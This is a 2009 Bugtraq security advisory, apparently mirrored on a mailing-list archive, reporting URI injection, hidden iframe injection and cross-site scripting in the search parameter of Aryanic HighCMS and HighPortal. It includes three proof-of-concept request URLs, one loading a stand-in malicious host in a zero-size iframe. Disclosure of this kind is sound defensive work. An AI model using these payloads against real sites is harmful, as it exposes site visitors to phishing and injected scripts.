|
|
 |
| New User, Welcome! Login |
Aryanic HighCMS and HighPortal multiple Vulnerabilities
| From: |
mr faghani gmail com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Aryanic HighCMS and HighPortal multiple Vulnerabilities |
| Date: |
Tue - Mar 10, 2009 06:10 AM |
================= IUT-CERT =================
Title: Aryanic HighPortal, HighCMS Multiple Vulnerabilities
Vendor: www.aryanic.com
Vulnerable Version: 10 and priors
Type: Input.Validation.Vulnerability (URI Injection, Frame Injection, XSS)
Fix: N/A
================== nsec.ir =================
Description:
------------------
Aryanic is the leading CMS producer in Iran. Search page in HighCMS and HighPortal
products are vulnerable to multiple input validation vulnerabilities.
Vulnerability Variant:
------------------
1- URI Injection "/web_search.aspx" in "q" parameter.
http://example.com/includes/web_search.aspx?id=1&q="<a href="http://www.malicious.com">clickme</a>
2- iFrame Injection "/web_search.aspx" in "q" parameter.
http://example.com/includes/web_search.aspx?id=1&q="iframe src ="http://www.malicious.com" width="0" height="0"></iframe>
3- Cross Site Scripting "/web_search.aspx" in "q" parameter.
http://example.com/includes/web_search.aspx?id=1&q="<script>alert(12345)</script>
Solution:
------------------
Input validation of Parameter "q" should be corrected.
Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : E. Jafari, N.Fathi, M. R. Faghani
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
